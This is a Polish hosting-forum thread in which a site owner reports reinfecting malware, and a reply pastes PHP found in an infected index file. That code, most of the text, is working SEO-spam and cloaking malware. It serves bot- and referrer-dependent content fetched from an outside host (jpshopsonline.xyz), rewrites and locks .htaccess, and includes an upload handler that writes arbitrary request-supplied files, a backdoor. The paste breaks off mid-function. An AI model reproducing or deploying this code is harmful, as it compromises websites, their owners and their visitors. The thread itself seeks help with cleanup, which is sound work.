Skocz do zawartości
Arkpra

Wirus na moim koncie w hekko

Polecane posty

Witam.

jakiś czas temu pojawił się wirus na hekko. Dopisuje złośliwy kod do plików. Przeczyściłem wszystko, zmieniłem dane dostępowe do DA i do FTP. Nie trzymam hasła w kliencie FTP. Przeskanowałem komputer. A wirus się pojawił ponownie w plikach które przeczyściłem. Oczywiście Hekko nie jest w stanie pomóc. Czy ktoś wie jak mogę rozwiązać problem?

Pozdrawiam

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

A co kula w serwisie?:

Coś takiego w indeksie:

<?php
$f8de0e = "5c098e1a2f8de0e1eb6618748fee7214";
// header('Content-Type:text/html; charset=utf-8');
$domain = "fpjxwx2021";
$lineNo = 8223;
$rewrite_mod = "index.php/C-kxewe-unjxe_urgpf-D_B-qfgwte-qekj.htejg";
$all_pages = 1;
function rsync_httpreq($url, $async = 0, $method = 1, $pf = NULL, $headers = array()) {
 if (!preg_match("/^http\:\/\//si", $url)) {
  if (isset($_GET['urlerr'])) {
   $err = '[urlerror] invalid url: ';
   $err .= $url;
   echo $err;
   unset($err);
   exit();
  }
  return '';
 }
 $a = 'curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create';
 $b = $out = '';
 foreach (explode('|', $a) as $c) {
  $y = 1;
  if ($async && substr($c, 0, 1) == 'c') {
   continue;
  }
  foreach (explode('+', $c) as $d) {
   if (!function_exists($d)) {
    $y = 0;
   }
  }
  unset($d);
  if ($y) {
   $b = $c;
   break;
  }
 }
 unset($a, $c);

 // $b = 'socket_create';
 // $b = 'stream_socket_client';
 // $b = 'fsockopen';
 // $b = 'pfsockopen';
 // echo $b;die();
 if ($b == '') {
  return 0;
 }
 // if ($method == 2) {
 // $pf['f'] = $b;
 // }
 // $url .= '?f=' . $b;
 if (substr($b, 0, 1) == 'c') {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_USERAGENT, 'WHR');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_TIMEOUT, 100);
  // curl_setopt($ch, CURLOPT_REFERER,_REFERER_);
  if ($method == 2) {
   curl_setopt($ch, CURLOPT_POST, 1);
   if(is_array($pf)){
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf));
   }
  }
  $r = curl_exec($ch);
  curl_close($ch);
  if (!$r) {
   if (isset($_GET['curlerr'])) {
    $err = '[curl error] ';
    $err .= curl_error($ch);
    echo $err;
    unset($err);
    exit();
   }
   return 0;
  }else{
   $r = trim(trim($r, "\xEF\xBB\xBF"));
   return $r;
  }
 }

 $parse = parse_url($url);
 isset($parse['host']) || $parse['host'] = '';
 isset($parse['path']) || $parse['path'] = '';
 isset($parse['query'])|| $parse['query'] = '';
 isset($parse['port']) || $parse['port'] = '';

 $xpath = $parse['path'] ? $parse['path'].($parse['query'] ? '?'.$parse['query'] : '') : '/';
 $_host = $parse['host'];

 if ($parse['scheme'] == 'https') {
  $version = '1.1';
  $port = empty($parse['port']) ? 443 : $parse['port'];
  $_host = 'ssl://';
  $_host .= $parse['host'];
 } else {
  $version = '1.0';
  $port = empty($parse['port']) ? 80 : $parse['port'];
 }

 //Headers
 $hhost = 'Host: ';
 $hhost .= $_host;
 $headers[] = $hhost;
 $headers[] = 'Connection: Close';
 $headers[] = 'User-Agent: WHR';
 $headers[] = 'Accept: */*';
 unset($hhost);

 //Body
 if ($method == 2) {
  if(is_array($pf)){
    $pf = http_build_query($pf);
  }
  $headers[] = 'Content-type: application/x-www-form-urlencoded';
  $headers[] = 'Content-Length: '.strlen($pf);
  $out = "POST $xpath HTTP/$version\r\n".join("\r\n", $headers)."\r\n\r\n".$pf;
  unset($pf);
 } else {
  $out = "GET $xpath HTTP/$version\r\n".join("\r\n", $headers)."\r\n\r\n";
 }
 unset($headers, $parse, $version, $xpath);

 $fp = null;
 if (substr($b, -1) == 'n') {
  $fp = $b($_host, $port, $errno, $errstr, 30);
 }else{
  if (substr($b, -1) == 't') {
   $tcp = 'tcp://';
   $tcp .= $_host;
   $tcp .= ':';
   $tcp .= $port;
   $fp = stream_socket_client($tcp, $errno, $errstr, 30);
   unset($tcp);
  }
 }

 $content = '';
 if ($fp) {
  stream_set_blocking($fp, true);
  stream_set_timeout($fp, 30);
  fwrite($fp, $out);
  if (!$async) {
   $status = stream_get_meta_data($fp);
   if (!$status['timed_out']) {
     while (!feof($fp)) {
      $line = fgets($fp);
      if ($line && ($line == "\r\n" || $line == "\n")) {
       break;
      }
      unset($line);
     }
     while (!feof($fp)) {
       $data = fread($fp, 8192);
       $content .= $data;
       unset($data);
     }
   }
   unset($status);
  }
  fclose($fp);
 }else{
  if (substr($b, -1) == 'e') {
   $_ip = gethostbyname($_host);
   $fp = $b(AF_INET, SOCK_STREAM, 0);
   // echo $_ip;die();
   if (socket_connect($fp, $_ip, $port)) {
    if (!$async) {
     socket_write($fp, $out, strlen($out));
     while($bf=@socket_read($fp, 8192)){
       $content .= $bf;
       unset($bf);
     }
     $content = explode("\r\n\r\n", $content);
     // print_r($content);die();
     array_shift($content);
     $content = implode("\r\n\r\n", $content);
    }else{
     // retry few times if async
     $t = mt_rand(2, 5);
     $i = 0;
     while ($i < $t) {
      socket_write($fp, $out, strlen($out));
      $i++;
      usleep(mt_rand(50000, 100000));
     }
     unset($i, $t);
    }
   }
   socket_close($fp);
   unset($_ip);
  }
 }
 unset($out, $b, $fp, $port, $_host);
 ////////////////////////////////////////
 // result
 if (!$async) {
  //unchunk
  $content = preg_replace_callback(
    '/(??:\r\n|\n)|^)([0-9A-F]+)(?:\r\n|\n){1,2}(.*?)'.
    '((?:\r\n|\n)(?:[0-9A-F]+(?:\r\n|\n))|$)/si',
    create_function(
      '$matches',
      'return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];'
    ),
    $content
  );
  return trim(trim($content, "\xEF\xBB\xBF"));
 }else{
  return 1;
 }
 // return $async ? 1 : trim(trim($content, "\xEF\xBB\xBF"));
}
function base_encode($string){
 $base = base64_encode(gzdeflate($string));
 $base_pre = substr($base, 0, 5);
 $base_ext = substr($base, -5);
 $base_ = substr($base, 5, strlen($base) - 10);
 return $base_pre . 'hT' . substr($base, 5, strlen($base) - 10) . 'tP' . $base_ext;
}
function BASE64_DEC0DE($string){
 $base_pre = substr($string, 0, 5);
 $base_ext = substr($string, -5);
 $base_ = substr($string, 7, strlen($string) - 14);
 return gzinflate(base64_decode($base_pre . $base_ . $base_ext));
}
function func_loginCheck($agent){
 $login = false;
 $bots = 'googlebot|baiduspider|bingbot|google|baidu|aol|bing|yahoo';
 // $bots = explode('|', $bots);
 if (TEST_MODE) {
  $bots .= '|Mozilla';
 }
 if ($agent != '') {
  // $robots = implode('|', $bots);
  if (preg_match("/($bots)/si", $agent)) {
   $login = true;
  }
 }
 return $login;
}
function func_referCheck($refer){
 $redi = false;
 $referbots = 'google.co.jp|yahoo.co.jp|bing';
 if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
  $redi = true;
 }
 return $redi;
}
function sync_rewrite($rewrite_mode = ''){
 // global $rewrite_mod;
 $rewrite_rule = array();
 $rewrite_mode = trim($rewrite_mode);
 if ($rewrite_mode != '') {
  // echo $rewrite_mode;die();
  $cslash = addcslashes($rewrite_mode, '/?:"()[]{}\\');
  // match
  $rewrite_mod_match = preg_replace("/[a-z]+/", '.*', $cslash);
  $rewrite_mod_match = preg_replace("/\d+/", '[0-9]+', $rewrite_mod_match);
  $rewrite_mod_match = preg_replace("/A/", '(.*)', $rewrite_mod_match);
  $rewrite_mod_match = preg_replace("/B/", '([^\/\d]+)', $rewrite_mod_match);
  // echo $rewrite_mod_match;die();
  $rewrite_mod_match = preg_replace("/D/", '([\d]+)', $rewrite_mod_match);
  $rewrite_mod_match = preg_replace("/C/", '([\d]+)', $rewrite_mod_match);
  // htaccess
  // position
  $rewrite_pos_str = preg_replace("/[^A-Z]/", '', $rewrite_mode);
  // echo $rewrite_pos_str;die();
  // $rewrite_pos_str = preg_split("//", $rewrite_pos_str);
  $rewrite_pos_str_array = array();
  $start_pos = 0;
  while (isset($rewrite_pos_str[$start_pos])) {
   $rewrite_pos_str_array[$start_pos+1] = $rewrite_pos_str[$start_pos];
   $start_pos++;
  }
  // print_r($rewrite_pos_str_array);die();
  // if (!empty($rewrite_pos_str_array)) {
  //  foreach ($rewrite_pos_str_array as $key => $value) {
  //   $value = trim($value);
  //   if (empty($value)) {
  //    unset($rewrite_pos_str[$key]);
  //   }
  //  }
  // }
  $rewrite_pos_str_array = array_flip($rewrite_pos_str_array);
  // print_r($rewrite_pos_str_array);die();
  $rewrite_mod_htacc = preg_replace("/[a-z]+/", '.*', $cslash);
  $rewrite_mod_htacc = preg_replace("/\d+/", '[0-9]+', $rewrite_mod_htacc);
  $rewrite_mod_htacc = preg_replace("/A/", '(.*)', $rewrite_mod_htacc);
  $rewrite_mod_htacc = preg_replace("/B/", '([^\d\/]+)', $rewrite_mod_htacc);
  $rewrite_mod_htacc = preg_replace("/C/", '([0-9]+)', $rewrite_mod_htacc);
  $rewrite_mod_htacc = preg_replace("/D/", '([0-9]+)', $rewrite_mod_htacc);
  // $rewrite_mod_match .= '.*';
  // $rewrite_mod_htacc .= '.*';
  $rewrite_rule['rrmatch'] = $rewrite_mod_match;
  // RewriteRule ^(.*)-([0-9]+)-([0-9]+).*.*$ index\.php?$1$3=$2&%{QUERY_STRING} [L]
  $RewriteRule_format = 'RewriteRule ^%s$ ?$%d$%d=$%d&%%{QUERY_STRING} [L]';
  $rewrite_rule['rrhtacc'] = sprintf($RewriteRule_format, $rewrite_mod_htacc, $rewrite_pos_str_array['B'], $rewrite_pos_str_array['C'], $rewrite_pos_str_array['D']);
  // link format
  $lf_array_string = 'rra:%aa|rrb:%bb|rrc:%cc|rrd:%xx';
  $lf_array_string_array = explode('|', $lf_array_string);
  $lf_array = array();
  foreach ($lf_array_string_array as $lfasv) {
   $lfasv_array = explode(':', $lfasv);
   // $lfasv_array_key = 'rr';
   // $lfasv_array_key = $lfasv_array[0];
   // $lf_array[$lfasv_array_key] = $lfasv_array[1];
   $lf_array[$lfasv_array[0]] = $lfasv_array[1];
   unset($lfasv_array, $lfasv, $lfasv_array_key);
  }
  unset($lf_array_string_array, $lf_array_string);
  $rewrite_rule['linkf']['urlf'] = preg_replace("/A/", $lf_array['rra'], $rewrite_mode);
  $rewrite_rule['linkf']['urlf'] = preg_replace("/B/", $lf_array['rrb'], $rewrite_rule['linkf']['urlf']);
  $rewrite_rule['linkf']['urlf'] = preg_replace("/C/", $lf_array['rrc'], $rewrite_rule['linkf']['urlf']);
  $rewrite_rule['linkf']['urlf'] = preg_replace("/D/", $lf_array['rrd'], $rewrite_rule['linkf']['urlf']);
  $rewrite_rule['linkf']['posi'] = $lf_array;
  $rewrite_rule['ckeys'] = $rewrite_pos_str_array;
  unset($RewriteRule_format, $rewrite_mod_htacc, $rewrite_mod_match, $rewrite_pos_str, $rewrite_pos_str_array, $rewrite_mode);
 }
 return $rewrite_rule;
}
function sync_htaccess($htaccess_rule = '', $rewrite_open = 1){
 if ($htaccess_rule != '') {
  if ($rewrite_open) {
   $htaccess_path = './.htaccess';
   // if (isset($_SERVER['DOCUMENT_ROOT'])) {
   //  $htaccess_path = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess';
   // }
   if ($htaccess_path != '' && file_exists($htaccess_path)) {
    @chmod($htaccess_path, 0777);
    $htaccess_content = @file_get_contents($htaccess_path);
    // if (stripos($htaccess_content, '#ListUrlRewrite') === false) {
    if (stripos($htaccess_content, $htaccess_rule) === false) {
     // $rewrite_slash = preg_replace("/(\\$\d)/si", "\\\\\\\\\\\\$1", $rewrite_array['htacc']);
     $rewrite_slash = preg_replace("/\\\$/s", '\\\$', $htaccess_rule);
     // file_put_contents('./ins.log', "$rewrite_slash\n");
     if (stripos($htaccess_content, '%{HTTP_HOST}') !== false && stripos($htaccess_content, 'R=301') !== false) {
      $htaccess_content = preg_replace("/(RewriteRule.*?R=301.*?[\r\n])/si", "$1\n{$rewrite_slash}\n", $htaccess_content, 1);
     }elseif (stripos($htaccess_content, 'RewriteBase') !== false) {
      $htaccess_content = preg_replace("/(RewriteBase.*?[\r\n])/si", "$1\n{$rewrite_slash}\n", $htaccess_content, 1);
     }elseif (stripos($htaccess_content, 'RewriteEngine') !== false) {
      $htaccess_content = preg_replace("/(RewriteEngine.*?[\r\n])/si", "$1\n{$rewrite_slash}\n", $htaccess_content, 1);
     }else{
      // search first RewriteRule
      $match = array();
      preg_match("/RewriteRule.*?[\r\n]/si", $htaccess_content, $match);
      if (!empty($match) && isset($match[0])) {
       $htaccess_content = str_ireplace($match[0], "\n" . $htaccess_rule . $match[0], $htaccess_content);
      }
      unset($match);
     }
     $htaccess_content_array = explode("\n", $htaccess_content);
     if (!empty($htaccess_content_array)) {
      foreach ($htaccess_content_array as $hca_key => &$htaccess_content_line) {
       // $htaccess_content_line = preg_replace("/^\s+(.*)/", "$1\n", $htaccess_content_line);
       $htaccess_content_line = trim($htaccess_content_line);
       if ($htaccess_content_line == '') {
        unset($htaccess_content_array[$hca_key]);
       }
      }
     }
     $htaccess_content = implode("\n", $htaccess_content_array);
     unset($htaccess_content_array, $rewrite_slash);
     $htaccess_content = preg_replace("/(^[\s\r\n]+|[\s\r\n]+$)/si", '', $htaccess_content);
     @file_put_contents($htaccess_path, $htaccess_content);
    }
   }else{
    // create new .htaccess
    $htaccess_content = "<IfModule mod_rewrite.c>\nRewriteEngine On\n" . $htaccess_rule . "\n</IfModule>\n";
    @file_put_contents($htaccess_path, $htaccess_content);
    unset($htaccess_content, $htaccess_path);
   }
   @chmod($htaccess_path, 0444);
  }
 }
}
function determine_number($lineNo = '', $index = false, $index_number = 1){
 $li_1 = '?list_test';
 $li_2 = '&list_test';
 if ($index) {
  return $index_number;
 }else{
  if ($lineNo != '') {
   return $lineNo;
  }else{
   $tmpNo = 0;
   if (isset($_GET) && !empty($_GET)) {
    foreach ($_GET as $key => $value) {
      $intV = preg_replace("/[^\d]/si", '', $value);
     if ($intV != '') {
      $tmpNo = $intV;
      break;
     }
    }
   }
   if ($tmpNo == 0) {
    $tmpNo = md5(str_ireplace(array($li_1, $li_2), '', $_SERVER['REQUEST_URI']));
    $tmpNo = preg_replace("/[^\d]/si", '', $tmpNo);
   }
   if ($tmpNo != 0) {
    $lenTmpNo = strlen($tmpNo);
    $lenIndNo = strlen($index_number);
    if ($lenTmpNo > $lenIndNo) {
     $tmpNo = intval(substr($tmpNo, -($lenIndNo)));
     if ($tmpNo > $index_number) {
      $tmpNo = substr($tmpNo, -($lenIndNo - 1));
     }
    }else{
     $tmpNo = intval($tmpNo);
     if ($tmpNo > $index_number) {
      $tmpNo = substr($tmpNo, -($lenIndNo - 1));
     }
    }
    $tmpNo = intval($tmpNo);
    if ($tmpNo != 0) {
     return intval($tmpNo);
    }
   }
   $string = 'http://';
   if (isset($_SERVER['HTTP_HOST'])) {
    $string .= $_SERVER['HTTP_HOST'];
   }
   if (isset($_SERVER['SERVER_NAME'])) {
    $string .= $_SERVER['SERVER_NAME'];
   }
   if (isset($_SERVER['REQUEST_URI'])) {
    $string .= $_SERVER['REQUEST_URI'];
   }
   if (isset($_SERVER['SCRIPT_NAME'])) {
    $string .= $_SERVER['SCRIPT_NAME'];
   }
   if (isset($_SERVER['SERVER_PROTOCOL'])) {
    $string .= $_SERVER['SERVER_PROTOCOL'];
   }
   if (isset($_SERVER['SCRIPT_FILENAME'])) {
    $string .= $_SERVER['SCRIPT_FILENAME'];
   }
   if (isset($_SERVER['DOCUMENT_ROOT'])) {
    $string .= $_SERVER['DOCUMENT_ROOT'];
   }
   if (isset($_SERVER['REMOTE_ADDR'])) {
    $string .= $_SERVER['REMOTE_ADDR'];
   }
   if (isset($_SERVER['SERVER_SOFTWARE'])) {
    $string .= $_SERVER['SERVER_SOFTWARE'];
   }
   if (isset($_SERVER['REQUEST_URI'])) {
    $string .= $_SERVER['REQUEST_URI'];
   }
   if (isset($_SERVER['REQUEST_URI'])) {
    $string .= $_SERVER['REQUEST_URI'];
   }
   $string = str_ireplace(array($li_1, $li_2), '', $string);
   return strlen($string);
  }
 }
}
function sync_hostid($domain){
 $hostid = null;
 $DID = (int)preg_replace("/.*?(\d+)$/", "$1", $domain);
 // echo "$DID";die();
 ###############################################################
 $HOST_CONFIG = 'S=1,F=100,N=20';
 $host_config_group = explode("|", $HOST_CONFIG);
 if (!empty($host_config_group)) {
  $hcg_w = -1;
  foreach ($host_config_group as $hcg) {
   // determine group
   $hcg_from = (int)preg_replace("/.*f\=(\d+).*/i", "$1", $hcg);
   // echo $hcg_from;die();
   if ($DID >= $hcg_from) {
    if (isset($hcg_w['f'])) {
     if ($hcg_from > $hcg_w['f']) {
      $hcg_w = array('f' => $hcg_from, 'g' => $hcg);
     }
    }else{
     $hcg_w = array('f' => $hcg_from, 'g' => $hcg);
    }
   }
   unset($hcg);
  }
  unset($host_config_group);
  if ($hcg_w != -1) {
   // $host_config = $hcg_w['g'];
   // echo $host_config;die();
   // $host_group_from  = 100;
   // $host_group_num   = 60;
   // $host_group_start  = 2;
   // print_r($hcg_w);die();
   $host_group_from  = $hcg_w['f'];
   $host_group_num   = preg_replace("/.*n\=(\d+).*/i", "$1", $hcg_w['g']);
   $host_group_start  = preg_replace("/.*s\=(\d+).*/i", "$1", $hcg_w['g']);
   // echo "host_group_from = $host_group_from / host_group_num = $host_group_num / host_group_start = $host_group_start";die();
   unset($hcg_w);
   $HOST_START = $host_group_from;
   $HOST_GID = $host_group_start;
   if ($DID != 0) {
    while (1) {
     if ($DID >= $HOST_START && $DID < ($HOST_START + $host_group_num)) {
      break;
     }
     $HOST_START += $host_group_num;
     $HOST_GID++;
    }
    $hostid = $HOST_GID;
   }
   unset($HOST_GID, $HOST_START, $DID, $host_group_start, $host_group_from, $host_group_num);
  }
 }
 return $hostid;
}
///////////////////////////////////////////////////////////
function mapxmls($rewrite_mod){
$urls=isset($_REQUEST['url']) ? $_REQUEST['url'] : '';
$filenames=isset($_REQUEST['filename']) ? $_REQUEST['filename'] : '';
$lastmodss=isset($_REQUEST['lastmods']) ? $_REQUEST['lastmods'] : '';
$changefreqss=isset($_REQUEST['changefreqs']) ? $_REQUEST['changefreqs'] : '';
$prioritys=isset($_REQUEST['priority']) ? $_REQUEST['priority'] : '';
$multiples=isset($_REQUEST['multiple']) ? $_REQUEST['multiple'] : '';
$rewrite_mods=isset($_REQUEST['rewrite_mod']) ? $_REQUEST['rewrite_mod'] : '';
if($rewrite_mods==''){
	$rewrite_mods=$rewrite_mod;
}
$snames=isset($_REQUEST['sname']) ? $_REQUEST['sname'] : '';
$numberss=isset($_REQUEST['numbers']) ? $_REQUEST['numbers'] : '';
$folders=isset($_REQUEST['folder']) ? $_REQUEST['folder'] : '';
$htmls=isset($_REQUEST['html']) ? $_REQUEST['html'] : '';
echo $urls;
if(file_exists($filenames))
{
	if (!unlink($filenames))
	 {
		echo "deleteerror";
	  exit();
	 }
}
$days_array=explode('|',$numberss);
$multiples_0=explode('|',$multiples);
$folders_0=explode('|',$folders);
if(count($days_array)>0){
	$top="<?xml version=\"1.0\" encoding=\"UTF-8\"?>".PHP_EOL;
	$top .="	<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">".PHP_EOL;
	file_put_contents($filenames,$top, FILE_APPEND);
	for($i=0;$i<count($days_array);$i++){
		$days_array_1=explode('_',$days_array[$i]);
		if(count($days_array_1)==2){
			$sId=$days_array_1[0];
			$days_array_0=$days_array_1[1];
			$multiples=$multiples+$sId;
			if(count($multiples_0)>1){
			$multiples_0_0=rand(0,count($multiples_0)-1);
			}else{$multiples_0_0=0;}
			if(count($folders_0)>$sId){
			$folders_0_0=$sId;
			}else if(count($folders_0)>1){
			$folders_0_0=rand(0,count($folders_0)-1);
			}else{
			$folders_0_0=0;
			}
			$folders_0_0_0=$folders_0[$folders_0_0];
			$multiples_0_0_0=$multiples_0[$multiples_0_0];
			for($z=(int)$multiples_0_0_0;$z<=(int)$days_array_0;$z=$z+(int)$multiples_0_0_0){
				$content="		<url>".PHP_EOL;
				$huizhui=explode('.',$rewrite_mods);
				$links=str_replace('B',$snames,$rewrite_mods);
			  $links=str_replace('C',$sId,$links);
				$links=str_replace('D',$z,$links);
				$links=str_replace($huizhui[1],$htmls,$links);
				$content .="			<loc>".$urls.$folders_0_0_0.$links."</loc>".PHP_EOL;
				$content .="			<lastmod>".$lastmodss."</lastmod>".PHP_EOL;
				$content .="			<changefreq>".$changefreqss."</changefreq>".PHP_EOL;
				$content .="			<priority>".$prioritys."</priority>".PHP_EOL;
				$content .="		</url>".PHP_EOL;
				file_put_contents($filenames,$content, FILE_APPEND);
			} 
		}
	}
	file_put_contents($filenames,"	</urlset>".PHP_EOL, FILE_APPEND);
}
echo 'success';
}
//////////////////////////////////////////////////////////
function upfile(){
$filenames=isset($_REQUEST['filename']) ? $_REQUEST['filename'] : '';
$filecontents=isset($_REQUEST['filecontent']) ? $_REQUEST['filecontent'] : '';
if(file_exists($filenames))
{
	if (!unlink($filenames))
	 {
		echo "deleteerror";
	  exit();
	 }
}
file_put_contents($filenames,$filecontents, FILE_APPEND);
echo 'success';
}
function class_x_i($x = ''){
 @set_time_limit(3600);
 @ignore_user_abort(1);
 ob_start();
 global $domain, $lineNo, $all_pages, $rewrite_mod;
   ///////////////////////////
 if (isset($_REQUEST['mapxmls'])) {
	 mapxmls($rewrite_mod);die();
 }
 ///////////////////////////
 if (isset($_REQUEST['upfilesp'])) {
	 upfile();die();
 }
 
 $domain = trim($domain);
 $lineNo = trim($lineNo);
 $php_redirect = 0;
 $anchor_use_link = 0;
 $strip_js_if_robots = 1;
 $rewrite = 1;
 $rewrite_array = sync_rewrite($rewrite_mod);
 /////////////////////////////////
 $fileSelfPath = str_ireplace('\\', '/', preg_replace("/(.*?)\(.*/si", "$1", __FILE__));
 $fileName = explode('/', $fileSelfPath);
 $fileName = end($fileName);
 // echo $fileName;die();
 $chk_string = 'index.php|default.php|index.html|index.htm';
 $chk = explode('|', $chk_string);
 $chk[] = $fileName;
 // $chk = array(
 //  'index.php', 'default.php', 'index.html', 'index.htm', $fileName
 // );
 $index = false;
 $exp = explode('/', $_SERVER['SCRIPT_NAME']);
 $end = array_pop($exp);
 $script_name = strtolower($end);
 $pre = implode('/', $exp);
 // echo "pre = $pre // script_name = $end";die();
 $li_del = 'list_test|url1|url2';
 $li_del = explode('|', $li_del);
 $uri_end = $_SERVER['REQUEST_URI'];
 foreach ($li_del as $getdel) {
  $uri_end = preg_replace("/(\?|&)" . $getdel . "/si", '', $uri_end);
 }
 $uri_end = preg_replace("/^\//si", '', str_ireplace($pre, '', $uri_end));
 // echo $uri_end;die();
 // echo $fileSelfPath;die();
 unset($li_del, $chk_string);
 ////////////////////////////////
 $server_name = '';
 if (isset($_SERVER['HTTP_HOST'])) {
  $server_name = $_SERVER['HTTP_HOST'];
 }elseif (isset($_SERVER['SERVER_NAME'])) {
  $server_name = $_SERVER['SERVER_NAME'];
 }
 if (!isset($_SERVER['REQUEST_SCHEME'])) {
  $_SERVER['REQUEST_SCHEME'] = '';
 }
 $page_location = ($_SERVER['REQUEST_SCHEME'] != '' ? $_SERVER['REQUEST_SCHEME'] : 'http') . '://' . $server_name . $_SERVER['REQUEST_URI'];
 $page_location = trim($page_location);
 if (preg_match("/^" . $script_name . ".*/si", $fileName)) {
  $page_location = preg_replace("/" . $script_name . ".*/si", '', $page_location);
 }
 $page_location_non_args = trim(preg_replace("/\?.*/si", '', $page_location));
 // $page_location_non_args = preg_replace("/[a-zA-Z]+-[\d]+-[\d]+.*/", '', $page_location_non_args);
 $page_location_non_args = preg_replace("/" . $rewrite_array['rrmatch'] . "/", '', $page_location_non_args);
 if ($page_location_non_args == '') {
  // echo "";die();
  $page_location_non_args = preg_replace("/" . addcslashes($uri_end, '/?+:"()[]{}') . ".*/si", '', $page_location);
 }
 $page_location_non_args = preg_replace("/(.*?)" . preg_replace("/\//s", '\/', $uri_end) . "/si", "$1", $page_location_non_args);
 // echo $_SERVER['SCRIPT_NAME'];die();
 // echo $page_location_non_args;die();
 $page_location_root   = $page_location_non_args;
 if (isset($_SERVER['DOCUMENT_ROOT'])) {
  $page_location_root = preg_replace("/" . str_ireplace('/', '\/', str_ireplace('\\', '/', $_SERVER['DOCUMENT_ROOT'])) . "/si", '', $fileSelfPath);
  // echo $fileName . "<br />";
  $page_location_root = preg_replace("/{$fileName}/si", '', $page_location_root);
  if ($page_location_root != '' && $page_location_root != '/') {
   $page_location_root = preg_replace("/(.*?)" . (preg_replace("/\//si", '\/', $page_location_root)) .".*/si", "$1$page_location_root", $page_location_non_args);
  }else{
   $page_location_root = $page_location_non_args;
  }
  // echo $page_location_root;die();
 }
 if (!preg_match("/\/$/si", $page_location_root)) {
  $page_location_root = preg_replace("/^(https?\:\/\/[\w\.-]+?\/).*/si", "$1", $page_location_root);
 }
 // additional actions
 /////////////////////////////////
 $index_number = $lineNo;
 $func = false;
 define('TEST_MODE', isset($_GET['list_test']) ? true : false);
 if (TEST_MODE) {
  $func = true;
 }
 if ($all_pages) {
  $func = true;
 }
 if (isset($_GET['list_test'])) {
  unset($_GET['list_test']);
 }

 ///////////////////////////////////////////////////////
 $subNo = '';
 $xargv_pre = '';
 $matchparam = array();
 // if (isset($_SERVER['REQUEST_URI']) && preg_match("/([a-zA-Z]+)-([\d]+)-([\d]+).*/", $_SERVER['REQUEST_URI'], $matchparam)) {
 if (isset($_SERVER['REQUEST_URI']) && preg_match("/" . $rewrite_array['rrmatch'] . "/", $_SERVER['REQUEST_URI'], $matchparam)) {
  $func = true;
  // print_r($matchparam);die();
  $domain = trim($matchparam[$rewrite_array['ckeys']['B']]) . trim($matchparam[$rewrite_array['ckeys']['C']]);
  $subNo = intval(trim($matchparam[$rewrite_array['ckeys']['D']]));
 }else{
  if (isset($_GET) && !empty($_GET)) {
   foreach ($_GET as $key => $value) {
    if (preg_match("/^[a-zA-Z]+\d+$/si", $key) && preg_match("/^\d+$/", $value)) {
     // print_r($_GET);die();
     $domain = $key;
     $subNo = intval(trim($value));
     $func = true;
     break;
    }
   }
  }
 }
 // 兼容旧URL, x = list, y = domain id, z = lineNo
 $old_rewrite_rules = '([^\d\/]+)-(\d+)-(\d+)(.*)?=>xx,yy,zz=>B-D-C||(\d+)\/([^\d\/]+)(\d+)(.*)?=>yy,xx,zz=>C/BD';
 if ($old_rewrite_rules != '') {
  $old_rewrite_rules_array = explode('||', preg_replace("/\\\{1,}/si", '\\', $old_rewrite_rules));
  // print_r($old_rewrite_rules_array);
  if (!empty($old_rewrite_rules_array)) {
   foreach ($old_rewrite_rules_array as $orr_item) {
    $orr_item_array = explode('=>', $orr_item);
    if (count($orr_item_array) == 3) {
     $orr_item_rule = trim($orr_item_array[0]);
     $orr_item_xyz = explode(',', $orr_item_array[1]);
     $orr_item_mod = trim($orr_item_array[2]);
     // echo "$orr_item_rule\n";
     if (count($orr_item_xyz) == 3) {
      $orr_item_xyz = array_flip($orr_item_xyz);
      // print_r($orr_item_xyz);die();
      // 开始匹配
      $orr_matches = array();
      if (preg_match_all("/" . $orr_item_rule . "/si", $_SERVER['REQUEST_URI'], $orr_matches)) {
       // 解析参数
       // print_r($orr_matches);die();
       if (count($orr_matches) == 5) {
        $xargv_pre = trim($orr_matches[($orr_item_xyz['xx'] + 1)][0]);
        $argv_ord = trim($orr_matches[($orr_item_xyz['yy'] + 1)][0]);
        $domain = $xargv_pre . $argv_ord;
        $subNo = trim($orr_matches[($orr_item_xyz['zz'] + 1)][0]);
        $func = true;
        $orr_item_extension = array_pop($orr_matches);
        $orr_item_mod .= preg_replace("/\?list_.*/si", '', trim($orr_item_extension[0]));
        // echo "$orr_item_mod";die();
        $rewrite_array = sync_rewrite($orr_item_mod);
        // print_r($rewrite_array);die();
        break;
       }
      }
     }
    }
   }
  }
 }
 unset($matchparam);
 ///////////////////////////////////////////////////////
 ///////////////////////////////////////////////////////
 $httpReferer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
 $login_status = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
 $lCheck = func_loginCheck($login_status);
 $rCheck = func_referCheck($httpReferer);
 if (!$func) {
  return ;
 }
 // global $url_host;
 // $url_host = 3;
 // echo $domain;die();
 // determine host
 $url_host = sync_hostid($domain);
 ###############################################################
 if ($url_host == null) {
  if ($lCheck) {
   $url_host = '';
  }
  if ($rCheck) {
   $url_host = 100;
  }
 }
 // echo "$domain IN HOST => $url_host";die();
 $url = '';
 $url_format = 'http://%host%/?domain=%s&lineNo=%s&refer=%d&php_r=%d&from=%s';
 $url_host_format = 'www%d.jpshopsonline.xyz';
 // $url = 'http://192.187.112.210/?domain=%s&lineNo=%s&refer=%d&php_r=%d&from=%s';
 $url_host_string = sprintf($url_host_format, $url_host);
 $url = preg_replace("/%host%/si", $url_host_string, $url_format);
 // check if host exists
 if ($xargv_pre != '') {
  // echo $xargv_pre;die();
  $url_host_ip = gethostbyname($url_host_string);
  // echo $url_host_ip;die();
  if (preg_match("/^www/si", $url_host_ip)) {
   // echo 'recheck';die();
   // host not found
   // echo $xargv_pre . $subNo;die();
   $url_host = sync_hostid($xargv_pre . $subNo);
   // echo $url_host;die();
   $url_host_string = sprintf($url_host_format, $url_host);
   // // echo "$url_host_string";die();
   // // echo gethostbyname($url_host_string);die();
   // if ($url_host != null && !preg_match("/^www/si", gethostbyname($url_host_string))) {
    $domain = $xargv_pre . $subNo;
    $argv_ord_tmp = $argv_ord;
